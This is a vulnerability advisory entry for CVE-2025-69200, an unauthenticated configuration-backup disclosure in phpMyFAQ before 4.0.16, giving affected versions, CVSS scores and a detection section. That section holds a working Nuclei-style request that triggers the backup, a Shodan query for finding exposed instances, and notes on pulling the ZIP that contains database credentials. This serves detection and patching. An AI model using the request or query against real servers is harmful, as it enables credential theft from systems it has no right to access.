cbcvebase.
CVE-2025-69200
published 2025-12-29


Priority: P181, high (CVSS 3.1 base score 7.5)
CVSS vector: AV:N / AC:L / PR:N / UI:N / S:U / C:H / I:N / A:N
Tags: ITW, EXPLOIT, VulnCheck KEV
Exploited in the wild
EPSS: 2.00% (78.4th percentile)
phpMyFAQ is an open source FAQ web application. In versions prior to 4.0.16, an unauthenticated remote attacker can trigger generation of a configuration backup ZIP via `POST /api/setup/backup` and then download the generated ZIP from a web-accessible location. The ZIP contains sensitive configuration files (e.g., `database.php` with database credentials), leading to high-impact information disclosure and potential follow-on compromise. Version 4.0.16 fixes the issue.

Affected

5 ranges
Vendor      Product    Version range                Fixed in
phpmyfaq    phpmyfaq   < 4.0.16                     4.0.16
phpmyfaq    phpmyfaq
thorsten    phpmyfaq   < 4.0.16                     4.0.16
thorsten    phpmyfaq   >= 0 < 4.0.16                4.0.16
thorsten    phpmyfaq   4.1.0-alpha – 4.1.0-beta.2

Detection & IOCs (extracted from sources)

url: POST /api/setup/backup
filename: database.php
sigma
id: CVE-2025-69200
info:
  name: phpMyFAQ - Configuration Backup Disclosure
  author: Louay-075
  severity: high
http:
- raw:
  - |
    POST /api/setup/backup HTTP/1.1
    Host: {{Hostname}}
    Content-Type: text/plain

    4.1.0-RC
  matchers-condition: and
  matchers:
  - type: word
    part: body
    words:
    - '"backupFile":"'
    - '.zip'
    condition: and
  - type: word
    words:
    - "error"
    - "forbidden"
    negative: true
  - type: word
    part: content_type
    words:
    - application/json
• Detect unauthenticated POST requests to /api/setup/backup; a JSON response containing 'backupFile' and '.zip' indicates successful backup generation.
• The exploit sends a plain-text body of '4.1.0-RC' with Content-Type: text/plain to POST /api/setup/backup with no authentication headers.
• Use Shodan query 'http.title:"phpMyFAQ"' to identify exposed phpMyFAQ instances for proactive scanning.
• The generated backup ZIP is placed in a web-accessible location and can be downloaded directly; monitor for .zip file downloads from the phpMyFAQ web root.
• Extract the backup file URL from the JSON response field '.backupFile' to locate the downloadable ZIP containing database.php credentials.
• The vulnerability affects phpMyFAQ versions prior to 4.0.16; the Nuclei template description incorrectly states '<= 4.0.16' but the fix is included in 4.0.16.
• No authentication is required to exploit this endpoint; network-level controls blocking unauthenticated access to /api/setup/backup are a viable mitigation until patching.

CVSS provenance

nvd: v3.1, 7.5 HIGH, CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
vulncheck: 7.5 HIGH